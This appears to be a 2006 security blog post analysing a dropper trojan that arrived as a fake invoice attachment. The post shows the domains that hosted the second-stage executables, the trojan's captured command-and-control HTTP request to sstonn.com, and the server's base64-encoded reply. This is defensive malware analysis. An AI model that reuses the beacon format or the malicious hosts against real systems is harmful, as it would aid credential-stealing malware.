We received a suspicious email today purporting to be an order confirmation from ‘element5info.com’ notifying us of an invoice for GBP 90.39, with an executable attached calling itself INV 4946911.exe. Putting it through a dozen different Anti Virus systems didn’t bring up any hits for known viruses.
It was a small (8kb) Windows executable which we immediately thought was a dropper trojan. These trojans are small applications that usually make connections out to an external host to download a larger, more complex trojan. As these are small, simple trojans, the virus writer is able to create many different variants and thus evade detection for a longer period.
When running the dropper in our sandbox, we observed it attempting to make an HTTP connection out to akgulati.com.
Looking at the site ourselves, we saw it returned an index page with a listing of two more executables; the site was registered in 2005/10/16 to a “Robert Holliday” of Orchard Park, New York (almost certainly a fake identify). The site is currently still available (as of 2006/05/19 13.00pm):
<a HREF="/">Parent Directory</A> 10-May-2006 17:06 -
<a HREF="suhoy316.exe">suhoy316.exe</A> 12-May-2006 02:05 273k
<a HREF="suhoy320.exe">suhoy320.exe</A> 17-May-2006 12:02 250k
The first, suhoy316.exe is a known virus, detected as Trojan.Agent-463 by our antivirus system. The second, suhoy320.exe was unknown, which is most likely to be a more recent variant of the the suhoy316 trojan.
Executing the unknown trojan on our sandbox we saw it run and install itself, and then delete its executable file. We couldn’t see any processes running, but when we ran InternetExplorer, we saw it attempt to contact sstonn.com.
We fooled the machine into thinking it had a fully open connection to the Internet, and ran the virus again, forcing all of our connections into netcat. We saw it connect back to sstonn.com and make the following request:
GET /line/navigator.php?tid=ID20060519130754703&ver=3.20 HTTP/1.1
Accept: */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: sstonn.com
Connection: Keep-Alive
From a cursory look at the ‘tid’ value, it is obviously a date/time stamp; e.g. 2006/05/19 13.07.54.703, we’re assuming the ‘703′ is time() to millisecond resolution. Running it again we never saw the ‘tid’ value change, so we’re assuming this is the install date of the trojan again as opposed to sending the server the current system time,
We see from the name of the executable suhoy320.exe that this is comparable to the ‘ver’ field from the http request, 3.20. We can thus make the assumption, suhoy316 is an earlier version of the same trojan.
Being a little drawn into the virus now, we wanted to know what the server would return had the trojan been allowed to make the request.
So we ran the request from a secured environment and saw the webserver return the following code:
<html>
<head>
<title>#SV#GET#COM#</title>
</head>
<body>{Tk8gQ09NQU5EUw==#{
</body>
</html>
It was immediately recognisable to us that ‘Tk8gQ09NQU5EUw==‘ is a base64 encoded string. Decoding this we revealed the words ‘NO COMANDS‘.
We shall have to keep our eyes out for when the site changes it’s return codes to something else. Maybe ‘DOS www.microsoft.com‘ or similar, or down load some other executable such as a key stroke logger or proxy.
Following the assumption that this unrecognised is a variant of 'suhoy.exe', we assume behaves similarly to this description of the trojan. This attempts to steal information from people logging into certain banking sites. Related to the larger trojan is its ‘dropper’ trojan Clagger.I which looks to be a older variant of our INV 4946911.exe (both of these droppers modify the registry in the same way).
Since first identifying the virus, several hours ago, we have seen quite a few arriving at various sites. Still no sign of any updates from the AV Vendors though. So watch out!